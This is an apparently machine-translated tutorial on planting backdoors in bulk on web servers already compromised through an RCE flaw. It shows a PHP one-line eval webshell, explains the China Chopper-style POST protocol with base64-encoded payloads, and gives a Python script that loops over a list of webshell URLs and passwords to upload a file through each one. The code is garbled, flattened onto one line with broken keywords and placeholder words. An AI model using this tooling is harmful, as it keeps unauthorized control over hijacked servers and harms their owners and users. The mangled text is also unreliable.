This article mainly introduces the related information about batch upload of a single file in PHP. For more information, please refer to the following section. when we crawl a lot of webshells in batches through a common RCE vulnerability, you may want to batch upload backdoors for future use. At this time, we can't help but face a problem. it is too slow to upload files one by one using a kitchen knife. how can we quickly implement the batch upload of files? This article describes how to implement such requirements based on php.
0 × 01 principle analysis
First, we must understand how the kitchen knife manages web server files through a Trojan.
The following is the most common php Trojan:
<?php eval($_POST[1]); ?>
When we upload a Trojan to the web server, we can directly enter the above password (1 in the above example) in the kitchen knife to connect to the server to manage files.
How can we manage and control servers with a simple sentence? By analyzing the principle of the kitchen knife, we can easily find that the kitchen knife uses the eval function to execute command statements passed through the POST method.
Therefore, if we want to upload a file by using a Trojan horse, we only need to send a POST request with the file write command to the url containing a sentence in the remote service. for example:
POST:
1 = @ eval ($ _ POST [z0]); & z0 = echo $ _ SERVER ['document _ root'];
The code above contains two parts:
1. one-sentence password
2. send the php code to the server for execution
Now that we know the principle, we only need to send the following POST request to complete the function of using one sentence to upload files:
POST:
1 = @ eval (base64_decode ($ _ POST [z0]); & z0 = signature + signature & z1 = L3Zhci93d3cvcm9vdC8xLnR4dA = & z2 = aGVsbG8gd29ybGQh
The POST data includes the following parts:
1. first, php password for one sentence 1
2. run the base64 decoded z0 using the eval method. the decoded z0 is displayed as follows:
@ Ini_set ("display_errors", "0"); @ set_time_limit (0); @ set_magic_quotes_runtime (0); echo ("-> | ");; $ f = base64_decode ($ _ POST ["z1"]); $ c = base64_decode ($ _ POST ["z2"]); $ c = str_replace ("\ r ", "", $ c); $ c = str_replace ("\ n", "", $ c); $ buf = ""; for ($ I = 0; $ I
3. continue to call z1 and z2 after base64 decoding in z0. the decoded results are as follows:
z1=/var/www/root/1.txtz2=hello world!
So far, we can clearly find that the role of the above POST request is actually to write! The file named 1.txt is uploaded to the/var/www/root/path on the server.
0 × 02 code implementation
Based on the above principle analysis, we can use the following code to implement batch file Upload based on a php sentence:
#! /Usr/bin/python # coding = UTF-8 import urllib import urllib2import sysimport base64import redef post (url, data): req = urllib2.Request (url) data = urllib. urlencode (data) opener = urllib2.build _ opener (urllib2.HTTPCookieProcessor () response = opener. open (req, data) return response. read () def get_shell_path (posturl, passwd): shell_path = "" try: data = {} data [passwd] = '@ eval (base64_decode ($ _ POST [z0]); 'Data ['z0'] = 'zwnobyakx1nfulzfulsnu0nssvbux0zjtevoqu1fj107 'shell_path = post (posturl, data ). strip () failed t Exception: pass return shell_pathdef main (): print '\ n ++ Batch Uploading Local File (Only for PHP webshell) ++ \ n' shellfile = sys. argv [1] # File for storing the webshell path and password localfile = sys. argv [2] # Local file to be uploaded: shell_file = open (shellfile, 'RB') local_content = str (open (localfile, 'RB '). read ()) For eachline in shell_file: posturl = eachline. split (',') [0]. strip () passwd = eachline. split (',') [1]. strip () try: reg = ". */([^/] * \. php ?) "Match_shell_name = re. search (reg, eachline) if match_shell_name: shell_name = match_shell_name.group (1) shell_path = get_shell_path (posturl, passwd ). strip () target_path = shell_path.split (shell_name) [0] + localfile target_path_base64 = base64.b64encode (target_path) target_file_url = eachline. split (shell_name) [0] + localfile data = {} data [passwd] = '@ eval (base64_decode ($ _ POST [z0]); 'data ['z0'] = 'qgluav9z Region + region Comment 'data ['z1 '] = target_path_base64 data ['z2'] = base64.b64encode (local_content) response = post (posturl, data) if response: print '[+]' + target_file_url + ', upload succeed! 'Else: print '[-]' + target_file_url + ', upload failed! 'Else: print '[-]' + posturl + ', unsupported webshell! 'Failed T Exception, e: print '[-]' + posturl + ', connection failed! 'Shell_file.close () if _ name _ = '_ main _': main ()
The format of webshell.txt: [path of a webshell file]. [webshell connection password] is as follows:
Http://www.example1.com/1.php, 1
Http://www.example2.com/1.php, 1
Http://www.example3.com/1.php, 1
Save the script batch_upload_file.py and run python batch_upload_file.py webshell.txt 1.txt. the result is as follows:
The above content introduces PHP's knowledge about batch upload of a single file. I hope you will like it.